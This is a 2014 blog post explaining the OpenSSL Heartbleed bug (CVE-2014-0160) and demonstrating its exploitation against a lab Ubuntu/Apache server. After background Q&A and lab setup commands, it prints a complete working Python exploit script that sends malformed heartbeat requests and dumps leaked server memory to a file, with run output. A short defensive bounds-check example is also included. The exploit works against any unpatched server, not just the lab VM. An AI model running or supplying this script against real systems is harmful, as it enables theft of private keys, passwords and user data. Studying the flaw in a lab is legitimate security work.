Monday, 28 April 2014

::: How to exploit Heartbleed Vulnerability & Demo PART 1 :::




Before showing the demo, let’s go through some background.
 
Q) What is SSL?
SSL stands for Secure Sockets Layer. It is an industry standard technology used for establishing a secure connection between two points, and encrypting the traffic that passes between them. In theory, SSL protects the data passed between a Web server and browser from being accessed or intercepted.

Q) What is OpenSSL?
OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements the basic cryptographic functions and provides various utility functions. Wrappers allowing the use of the OpenSSL library in a variety of computer languages are available.

Source: Wikipedia.com

Q) What is “Heartbeat” extension?
The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation and a basis for path MTU (PMTU) discovery for DTLS.

Q) About the Heartbleed bug?
Millions of websites may have been leaking critically sensitive data for the past two years, thanks to a devastating flaw in the OpenSSL software many sites use to encrypt and transmit data.

The Heartbleed bug, as it’s called by the researchers who discovered it, would let anyone on the Internet get into a supposedly secure Web server running certain versions of OpenSSL and scoop up the site’s encryption keys, user passwords and site content.
Once an attacker has a website’s encryption keys, anything is fair game: Instead of slipping through a proverbial crack in the wall, he can now walk in and out the front door.

There have been no documented instances of attacks exploiting the Heartbleed bug. But because an attack using the bug would leave no trace, and the potential damage from an attack would be so significant, all websites that ever used the affected versions of OpenSSL should be considered compromised.

Top sites — including Facebook, Google, Wikipedia, Amazon, Twitter, Apple and Microsoft — are not currently vulnerable, though some may have been in the past.


Q) How does the Heartbleed bug work?
Most secure websites encrypt traffic to and from their servers using a protocol called SSL/TLS. There are several different encryption “libraries” that can be used in this protocol, and one of the most widely used is an open-source library called OpenSSL.

The Heartbleed bug is in versions of OpenSSL issued from December 2011 onward, not in SSL/TLS itself. Not every instance of SSL or TLS encryption across the Internet is compromised. But OpenSSL is the default encryption library in Apache and Nginx server software, which power two-thirds of all websites.

An attack exploiting the Heartbleed bug would leave no trace in an attacked Web server’s logs. It’s impossible to tell how many sites, if any, may have been exploited, and how many may have been vulnerable over the past two years.

Neel Mehta of Google Security and a team of engineers at Oulu, Finland-based security company Codenomicon first discovered the Heartbleed bug, though they haven’t specified when. They’ve created a FAQ page at heartbleed.com with full details.

The bug’s name refers to a handshake (process of connecting to a network) in OpenSSL’s code called the “heartbeat extension,” which sets a limit on how long an encrypted session stays valid. A coding error meant that the extension was missing a necessary verification (called a bounds check), thus giving an attacker access to additional information about the server and creating the vulnerability.
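The missing bounds check can be seen in the heartbeat requests that the script in Step 6 sends. The following is an added example, not part of the original post or of OpenSSL: it parses a plaintext heartbeat record and applies the length rule from RFC 6520. The function names, the result fields and the "ping" request are constructed for illustration.

```python
import struct

HEARTBEAT_RECORD = 0x18  # TLS content type 24 (the script's "typ == 24")
HB_HEADER = 3            # 1-byte message type + 2-byte payload_length
MIN_PADDING = 16         # RFC 6520: at least 16 bytes of padding


def inspect_heartbeat(record):
    """Parse one plaintext TLS heartbeat record and apply the bounds check."""
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, rec_len = struct.unpack(">BHH", record[:5])
    if ctype != HEARTBEAT_RECORD:
        raise ValueError("not a heartbeat record (type %d)" % ctype)
    body = record[5:5 + rec_len]
    if len(body) != rec_len:
        raise ValueError("record body shorter than its header claims")
    result = {"version": version, "record_len": rec_len, "hb_type": None,
              "claimed": None, "excess": 0, "action": "discard"}
    if rec_len < HB_HEADER:
        return result  # too short to hold even the heartbeat header
    hb_type, claimed = struct.unpack(">BH", body[:HB_HEADER])
    # Bytes a receiver without the check would copy from beyond the request.
    excess = max(0, claimed - (rec_len - HB_HEADER))
    # The bounds check: header + claimed payload + padding must fit inside
    # the record that actually arrived, otherwise the message is dropped.
    fits = HB_HEADER + claimed + MIN_PADDING <= rec_len
    result.update(hb_type=hb_type, claimed=claimed, excess=excess,
                  action="process" if fits else "discard")
    return result


def build_request(payload, version=0x0302):
    """Constructed well-formed request: declared length equals real length."""
    body = struct.pack(">BH", 1, len(payload)) + payload + b"\x00" * MIN_PADDING
    return struct.pack(">BHH", HEARTBEAT_RECORD, version, len(body)) + body


# Heartbeat requests copied from the script in Step 6 (hbv10, hbv11, hbv12).
PAGE_REQUESTS = [bytes.fromhex(h) for h in (
    "18 03 01 00 03 01 40 00",
    "18 03 02 00 03 01 40 00",
    "18 03 03 00 03 01 40 00",
)]
WELL_FORMED = build_request(b"ping")  # constructed sample, not from the page

if __name__ == "__main__":
    for rec in PAGE_REQUESTS + [WELL_FORMED]:
        print(inspect_heartbeat(rec))
```

Each request from the page arrives in a 3-byte record but declares a 16384-byte payload, so a receiver applying the check discards it; the constructed request declares exactly what it carries and is processed.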

The most recent version of OpenSSL, 1.0.1g, patches the flaw, so any websites running OpenSSL should upgrade to the newest version immediately.

However, the damage has been done. Versions of OpenSSL with the bug have been in use for more than two years. If an attacker used the Heartbleed bug to get into a Web server, he would have access to the website’s “crown jewels”: its encryption keys.

With the keys, attackers could decrypt traffic to and from the server; impersonate the server so that users who think they’re visiting a given website are actually visiting a fraudulent site disguised as the correct one; or decrypt the server’s databases, including their users’ personal information, such as usernames, passwords, email addresses, payment information and more.

Web servers that use or used vulnerable versions of OpenSSL need to do more than upgrade to the latest version of OpenSSL; they also need to revoke and reissue all of their encryption certificates. It’s no use boarding up a hole in the wall if the intruders can now let themselves in through the front door.

Q) Who is Affected?
Administrators of websites using Apache or Nginx server software need to evaluate whether they have, or had used, vulnerable versions of OpenSSL. Such websites should be considered compromised.

OpenSSL is also incorporated into email servers using the SMTP, POP and IMAP protocols; chat servers using the SMPP protocol; and most virtual private networks (VPNs) that use SSL to protect their networks.

Want to check if an individual Web domain is affected?
Check whether your domain is safe from Heartbleed by typing your domain name into the URL below.

Q) What should you do?
Unless you’re a system administrator, there’s not much you can do right now. We can’t even recommend that you change your online passwords — not yet, at least. If a website hasn’t upgraded its OpenSSL library and changed its encryption certificates, then a new password would be just as compromised as an old one.

The vulnerable versions of OpenSSL are 1.0.0 through 1.0.1f. If you’re a website administrator and can’t upgrade to the newest version, then you can manually disable the heartbeat function and then recompile OpenSSL’s code.

It’s Show Time !!!

Many people asked me to provide a Heartbleed exploit demo. So your wait ends here; let’s have some action.

Prerequisites:
1.      VMware Workstation or Virtual Box.
2.      Ubuntu  12.04 ISO

I hope you know how to run Ubuntu in a virtual machine … I’m just kidding :P … If you don’t, Google it…

Step 1: I downloaded an Ubuntu 12.04 ISO, which has a default OpenSSL version of 1.0.1 and is vulnerable to Heartbleed.

Step 2: Next I'll install Apache, enable SSL and accept the default Ubuntu certificate.

Step 3: Run the Ubuntu machine, open a terminal and type the commands below:

#sudo apt-get install apache2
#sudo a2enmod ssl
#service apache2 restart
#service apache2 status
#sudo a2ensite default-ssl
#service apache2 reload
#service apache2 restart

I hope you did exactly what I did, right?

This will create a Web server which uses https on Port 443. In the demo I run the Ubuntu server in VMware Workstation at IP 192.168.61.131.

Step 4: Check your OpenSSL version and other information.

#openssl version -a
OpenSSL 1.0.1 28 Apr 2014

Step 5: Next, a Web connection is used to verify the connection, after which the following command can be used to access the server.

#openssl s_client -connect 192.168.61.131:443 -tlsextdebug
CONNECTED(00000003)
TLS server extension "renegotiation info" (id=65281), len=1
0001 - <SPACES/NULS>
TLS server extension "session ticket" (id=35), len=0
TLS server extension "heartbeat" (id=15), len=1   <-- Vulnerability
0000 - 01                                                .
depth=0 CN = ubuntu
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ubuntu
verify return:1
---
Certificate chain
 0 s:/CN=ubuntu
   i:/CN=ubuntu
---
Server certificate
subject=/CN=ubuntu
issuer=/CN=ubuntu
---
No client certificate CA names sent
---
SSL handshake has read 1573 bytes and written 439 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.1
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 9206481F74BE3E642870690D7484AD773C3D1265193DE87A2D1353B8D80893E5
    Session-ID-ctx:
    Master-Key: D8DA9DDF1019EB7FCB96A978DE628B33D41BA7869385A5B5F55DB537E829D00A902EABEAE8C0B30804AC931A6A3E9E54
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:

    Start Time: 1398683776
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---

Step 6: Copy the Python script below into an editor and save it as hb_exploit.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
# Note: this is a Python 2 script (print statements, str.decode('hex'), xrange).
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')

def h2bin(x):
    # Convert a whitespace-separated hex string into raw bytes.
    return x.replace(' ', '').replace('\n', '').decode('hex')

# TLS Client Hello record (record type 0x16) that advertises the heartbeat extension.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat requests, one per TLS version. First line: record type 0x18,
# version, record length 3. Second line: heartbeat type 1 (request) and a
# declared payload length of 0x4000, with no payload actually following.
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')

hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')

hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')

def hexdump(s, dumpf, quiet):
    # Append the raw bytes to the dump file, then print a hex/ASCII view.
    dump = open(dumpf,'a')
    dump.write(s)
    dump.close()
    if quiet: return
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    # Read exactly 'length' bytes, or whatever arrived before the timeout.
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            if not rdata:
                return None
            else:
                return rdata
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    # Read one TLS record: 5-byte header (type, version, length) plus payload.
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s, dumpf, host, quiet):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received from '+host+', server likely not vulnerable'
            return False

        # Record type 24: heartbeat response.
        if typ == 24:
            if not quiet: print 'Received heartbeat response:'
            hexdump(pay, dumpf, quiet)
            if len(pay) > 3:
                print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'
            else:
                print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'
            return True

        # Record type 21: alert.
        if typ == 21:
            if not quiet: print 'Received alert:'
            hexdump(pay, dumpf, quiet)
            print 'Server '+ host +' returned error, likely not vulnerable'
            return False

def connect(host, port, quiet):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if not quiet: print 'Connecting...'
    sys.stdout.flush()
    s.connect((host, port))
    return s

def tls(s, quiet):
    if not quiet: print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    if not quiet: print 'Waiting for Server Hello...'
    sys.stdout.flush()

def parseresp(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return 0
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            return ver

def check(host, port, dumpf, quiet, starttls):
    response = False
    if starttls:
        try:
            s = smtplib.SMTP(host=host,port=port)
            s.ehlo()
            s.starttls()
        except smtplib.SMTPException:
            print 'STARTTLS not supported...'
            s.quit()
            return False
        print 'STARTTLS supported...'
        s.quit()
        s = connect(host, port, quiet)
        s.settimeout(1)
        try:
            re = s.recv(1024)
            s.send('ehlo starttlstest\r\n')
            re = s.recv(1024)
            s.send('starttls\r\n')
            re = s.recv(1024)
        except socket.timeout:
            print 'Timeout issues, going ahead anyway, but it is probably broken ...'
        tls(s,quiet)
    else:
        s = connect(host, port, quiet)
        tls(s,quiet)

    version = parseresp(s)

    if version == 0:
        if not quiet: print "Got an error while parsing the response, bailing ..."
        return False
    else:
        version = version - 0x0300
        if not quiet: print "Server TLS version was 1.%d\n" % version

    if not quiet: print 'Sending heartbeat request...'
    sys.stdout.flush()
    # Send the heartbeat request that matches the negotiated record version.
    if (version == 1):
        s.send(hbv10)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 2):
        s.send(hbv11)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 3):
        s.send(hbv12)
        response = hit_hb(s,dumpf, host, quiet)
    s.close()
    return response

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
    for i in xrange(0,opts.num):
        check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)

if __name__ == '__main__':
    main()

Step 7: Next we run the python script hb_exploit.py to capture the running memory from the server.

#chmod a+x hb_exploit.py
#ls
hb_exploit.py
#python hb_exploit.py 192.168.61.131
Scanning 192.168.61.131 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 684
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
  00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  ...
  3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

WARNING: server 192.168.61.131 returned more data than it should - server is vulnerable!

Thus we can see the memory of the server, with running keys.

Step 8: Save the captured memory in hbdump.txt
#python hb_exploit.py 192.168.61.131 > hbdump.txt
#nano hbdump.txt (You can use any editor to view the file vi,pico,gedit etc)

I hope you will like it ...
